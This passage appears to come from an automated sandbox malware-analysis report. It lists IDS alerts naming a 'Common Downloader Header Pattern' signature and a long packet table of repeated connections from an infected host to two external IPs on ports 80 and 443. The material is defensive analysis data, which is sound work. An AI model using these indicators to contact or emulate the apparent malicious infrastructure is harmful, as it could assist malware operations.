2025-01-13T10:12:15.127412+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49749	104.21.64.1	443	TCP
2025-01-13T10:12:19.285548+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49750	132.226.247.73	80	TCP
2025-01-13T10:12:20.316790+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49750	132.226.247.73	80	TCP
2025-01-13T10:12:20.906180+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49754	104.21.64.1	443	TCP
2025-01-13T10:12:21.660532+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49756	132.226.247.73	80	TCP
2025-01-13T10:12:25.293521+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49762	104.21.64.1	443	TCP
2025-01-13T10:12:29.316786+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49768	104.21.64.1	443	TCP
2025-01-13T10:12:30.638274+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49770	104.21.64.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 10:12:04.634944916 CET	49730	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:04.639812946 CET	80	49730	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:04.639878988 CET	49730	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:04.640069008 CET	49730	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:04.644895077 CET	80	49730	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:05.341131926 CET	80	49730	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:05.345182896 CET	49730	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:05.349987030 CET	80	49730	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:05.559529066 CET	80	49730	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:05.609103918 CET	49733	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:05.609164000 CET	443	49733	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:05.609231949 CET	49733	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:05.613559008 CET	49730	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:05.616957903 CET	49733	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:05.616980076 CET	443	49733	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:06.089864969 CET	443	49733	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:06.089952946 CET	49733	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:06.095277071 CET	49733	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:06.095300913 CET	443	49733	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:06.095801115 CET	443	49733	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:06.144516945 CET	49733	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:06.187370062 CET	443	49733	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:06.254585028 CET	443	49733	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:06.254755020 CET	443	49733	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:06.254828930 CET	49733	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:06.260636091 CET	49733	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:06.264095068 CET	49730	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:06.269093990 CET	80	49730	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:06.484824896 CET	80	49730	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:06.492065907 CET	49734	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:06.492115974 CET	443	49734	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:06.496614933 CET	49734	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:06.496998072 CET	49734	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:06.497011900 CET	443	49734	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:06.535490990 CET	49730	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:06.972868919 CET	443	49734	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:06.975419998 CET	49734	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:06.975455999 CET	443	49734	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:07.123799086 CET	443	49734	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:07.123867989 CET	443	49734	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:07.123930931 CET	49734	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:07.124543905 CET	49734	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:07.128191948 CET	49730	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:07.129157066 CET	49736	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:07.133183956 CET	80	49730	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:07.133332968 CET	49730	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:07.134047031 CET	80	49736	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:07.134147882 CET	49736	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:07.134248018 CET	49736	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:07.139048100 CET	80	49736	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:07.930176020 CET	80	49736	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:07.932163954 CET	49737	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:07.932224989 CET	443	49737	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:07.932312012 CET	49737	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:07.932558060 CET	49737	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:07.932571888 CET	443	49737	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:07.973198891 CET	49736	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:08.407444000 CET	443	49737	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:08.409713984 CET	49737	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:08.409738064 CET	443	49737	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:08.548619986 CET	443	49737	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:08.548696041 CET	443	49737	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:08.548754930 CET	49737	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:08.549249887 CET	49737	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:08.553942919 CET	49738	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:08.558892012 CET	80	49738	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:08.558991909 CET	49738	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:08.559062958 CET	49738	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:08.563921928 CET	80	49738	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:09.252350092 CET	80	49738	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:09.253659964 CET	49739	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:09.253704071 CET	443	49739	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:09.253768921 CET	49739	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:09.254074097 CET	49739	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:09.254090071 CET	443	49739	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:09.301105022 CET	49738	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:09.727356911 CET	443	49739	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:09.734909058 CET	49739	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:09.734930992 CET	443	49739	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:09.858114004 CET	443	49739	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:09.858186007 CET	443	49739	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:09.858228922 CET	49739	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:09.858844995 CET	49739	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:09.862792015 CET	49738	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:09.863425970 CET	49741	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:09.867924929 CET	80	49738	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:09.868001938 CET	49738	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:09.868279934 CET	80	49741	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:09.868345022 CET	49741	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:09.868433952 CET	49741	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:09.873255968 CET	80	49741	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:10.578663111 CET	80	49741	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:10.580585003 CET	49743	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:10.580627918 CET	443	49743	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:10.580949068 CET	49743	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:10.581197023 CET	49743	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:10.581212044 CET	443	49743	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:10.629218102 CET	49741	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:11.065196991 CET	443	49743	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:11.066931009 CET	49743	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:11.066955090 CET	443	49743	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:11.204503059 CET	443	49743	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:11.204696894 CET	443	49743	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:11.204812050 CET	49743	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:11.205054998 CET	49743	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:11.208122969 CET	49741	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:11.209289074 CET	49744	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:11.213076115 CET	80	49741	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:11.213155985 CET	49741	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:11.214180946 CET	80	49744	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:11.214252949 CET	49744	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:11.214314938 CET	49744	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:11.219049931 CET	80	49744	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:11.888705015 CET	80	49744	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:11.889797926 CET	49745	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:11.889849901 CET	443	49745	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:11.889923096 CET	49745	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:11.890182972 CET	49745	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:11.890196085 CET	443	49745	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:11.941723108 CET	49744	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:12.365411997 CET	443	49745	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:12.379086971 CET	49745	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:12.379139900 CET	443	49745	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:12.501655102 CET	443	49745	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:12.501714945 CET	443	49745	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:12.504072905 CET	49745	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:12.504916906 CET	49745	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:12.508702993 CET	49744	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:12.509794950 CET	49746	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:12.514672995 CET	80	49744	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:12.514714003 CET	80	49746	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:12.514754057 CET	49744	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:12.514796972 CET	49746	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:12.514905930 CET	49746	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:12.519753933 CET	80	49746	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:13.194729090 CET	80	49746	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:13.195991039 CET	49747	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:13.196088076 CET	443	49747	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:13.196173906 CET	49747	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:13.196424961 CET	49747	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:13.196456909 CET	443	49747	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:13.238749027 CET	49746	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:13.678220987 CET	443	49747	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:13.679919004 CET	49747	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:13.679997921 CET	443	49747	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:13.814466000 CET	443	49747	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:13.814529896 CET	443	49747	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:13.814641953 CET	49747	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:13.815129042 CET	49747	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:13.818316936 CET	49746	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:13.819528103 CET	49748	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:13.823467970 CET	80	49746	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:13.824341059 CET	80	49748	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:13.824430943 CET	49746	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:13.824470997 CET	49748	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:13.824549913 CET	49748	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:13.829262018 CET	80	49748	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:14.512423038 CET	80	49748	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:14.513997078 CET	49749	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:14.514053106 CET	443	49749	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:14.514111996 CET	49749	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:14.514394999 CET	49749	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:14.514408112 CET	443	49749	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:14.566782951 CET	49748	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:14.996531963 CET	443	49749	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:15.015871048 CET	49749	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:15.015907049 CET	443	49749	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:15.127393961 CET	443	49749	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:15.127454042 CET	443	49749	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:15.127506971 CET	49749	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:15.136281967 CET	49749	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:18.303546906 CET	49750	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:18.308557987 CET	80	49750	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:18.308626890 CET	49750	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:18.308895111 CET	49750	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:18.313741922 CET	80	49750	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:19.001573086 CET	80	49750	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:19.010643959 CET	49750	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:19.015743971 CET	80	49750	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:19.230863094 CET	80	49750	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:19.281492949 CET	49751	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:19.281548023 CET	443	49751	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:19.281615973 CET	49751	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:19.285547972 CET	49750	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:19.286421061 CET	49751	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:19.286438942 CET	443	49751	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:19.760032892 CET	443	49751	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:19.760118961 CET	49751	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:19.761861086 CET	49751	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:19.761868000 CET	443	49751	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:19.762125969 CET	443	49751	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:19.816757917 CET	49751	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:19.876844883 CET	49751	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:19.923321962 CET	443	49751	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:19.985959053 CET	443	49751	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:19.986025095 CET	443	49751	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:19.986064911 CET	49751	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:19.989883900 CET	49751	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:20.059282064 CET	49750	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:20.064148903 CET	80	49750	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:20.270972967 CET	80	49750	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:20.290370941 CET	49754	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:20.290433884 CET	443	49754	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:20.290502071 CET	49754	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:20.290832996 CET	49754	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:20.290848017 CET	443	49754	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:20.316790104 CET	49750	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:20.765120029 CET	443	49754	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:20.767718077 CET	49754	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:20.767755032 CET	443	49754	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:20.906162024 CET	443	49754	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:20.906243086 CET	443	49754	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:20.906310081 CET	49754	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:20.906867981 CET	49754	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:20.911606073 CET	49750	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:20.913397074 CET	49756	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:20.918327093 CET	80	49756	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:20.918486118 CET	49756	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:20.918590069 CET	49756	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:20.923434019 CET	80	49756	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:20.924690962 CET	80	49750	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:20.924743891 CET	49750	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:21.619364977 CET	80	49756	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:21.621716022 CET	49759	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:21.621741056 CET	443	49759	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:21.621854067 CET	49759	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:21.622076988 CET	49759	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:21.622087955 CET	443	49759	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:21.660531998 CET	49756	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:23.030909061 CET	443	49759	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:23.043423891 CET	49759	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:23.043479919 CET	443	49759	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:23.170120955 CET	443	49759	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:23.170196056 CET	443	49759	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:23.170399904 CET	49759	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:23.170803070 CET	49759	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:23.176407099 CET	49760	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:23.181341887 CET	80	49760	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:23.181413889 CET	49760	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:23.181508064 CET	49760	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:23.186306000 CET	80	49760	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:24.707535982 CET	80	49760	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:24.707962036 CET	80	49760	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:24.708020926 CET	49760	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:24.708024979 CET	80	49760	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:24.708065033 CET	49760	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:24.709358931 CET	49762	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:24.709410906 CET	443	49762	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:24.709501028 CET	49762	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:24.709773064 CET	49762	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:24.709788084 CET	443	49762	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:25.168642044 CET	443	49762	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:25.177817106 CET	49762	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:25.177838087 CET	443	49762	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:25.293600082 CET	443	49762	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:25.293756962 CET	443	49762	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:25.294473886 CET	49762	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:25.294475079 CET	49762	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:25.298312902 CET	49760	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:25.299420118 CET	49763	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:25.303311110 CET	80	49760	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:25.304227114 CET	80	49763	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:25.304306030 CET	49760	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:25.304337978 CET	49763	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:25.304470062 CET	49763	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:25.309223890 CET	80	49763	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:25.977600098 CET	80	49763	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:25.979063988 CET	49764	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:25.979130030 CET	443	49764	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:25.979265928 CET	49764	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:25.979613066 CET	49764	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:25.979625940 CET	443	49764	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:26.019941092 CET	49763	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:26.434468985 CET	443	49764	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:26.436443090 CET	49764	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:26.436476946 CET	443	49764	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:26.694293022 CET	443	49764	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:26.694377899 CET	443	49764	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:26.694741011 CET	49764	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:26.695215940 CET	49764	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:26.699423075 CET	49763	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:26.700792074 CET	49765	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:26.704417944 CET	80	49763	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:26.704500914 CET	49763	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:26.705852032 CET	80	49765	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:26.706012964 CET	49765	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:26.706052065 CET	49765	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:26.710813046 CET	80	49765	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:27.406127930 CET	80	49765	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:27.407641888 CET	49766	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:27.407748938 CET	443	49766	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:27.407862902 CET	49766	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:27.408143997 CET	49766	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:27.408169985 CET	443	49766	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:27.457490921 CET	49765	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:27.866615057 CET	443	49766	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:27.878154039 CET	49766	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:27.878201008 CET	443	49766	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:27.996128082 CET	443	49766	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:27.996270895 CET	443	49766	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:27.996356010 CET	49766	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:27.996820927 CET	49766	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:28.001437902 CET	49765	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:28.002659082 CET	49767	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:28.007694960 CET	80	49765	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:28.007775068 CET	49765	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:28.008763075 CET	80	49767	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:28.008836031 CET	49767	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:28.008965969 CET	49767	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:28.015077114 CET	80	49767	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:28.707839012 CET	80	49767	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:28.709494114 CET	49768	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:28.709563971 CET	443	49768	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:28.709661961 CET	49768	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:28.710115910 CET	49768	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:28.710129976 CET	443	49768	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:28.754380941 CET	49767	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:29.185853958 CET	443	49768	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:29.187499046 CET	49768	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:29.187531948 CET	443	49768	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:29.316744089 CET	443	49768	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:29.316931963 CET	443	49768	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:29.317020893 CET	49768	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:29.317327023 CET	49768	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:29.321003914 CET	49767	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:29.322061062 CET	49769	80	192.168.2.4	132.226.247.73
